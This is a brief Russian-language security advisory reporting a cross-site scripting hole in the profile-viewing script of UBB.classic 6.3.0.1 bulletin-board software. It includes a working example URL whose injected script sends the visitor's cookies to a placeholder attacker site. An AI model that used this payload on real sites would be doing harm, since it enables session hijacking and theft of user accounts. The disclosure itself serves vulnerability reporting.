UBB (Ultimate Bulletin Board) – BBS система от http://www.infopop.com/.
Межсайтовый скрптинг обнаружен в сценарии просмотра информации пользователя. Атакующий может создать злонамеренную ссылку, содержащую произвольный код сценария, который будет выполнен в браузере пользователя, в контексте уязвимого сайта, например для хищения cookies пользователя. Пример:
http://attacked_site/cgi-bin/ forum/ultimatebb.cgi?ubb=get_profile;u=<script>
window.location.href(%22http://hacker_site/
get.php?cookies=%22%2Bdocument.cookie) </script>
Уязвимость обнаружена в UBB.classic 6.3.0.1 на более ранних/поздних проверено не было.
Нашёл: [Jaguar] MaZaFaKa.Ru Team.
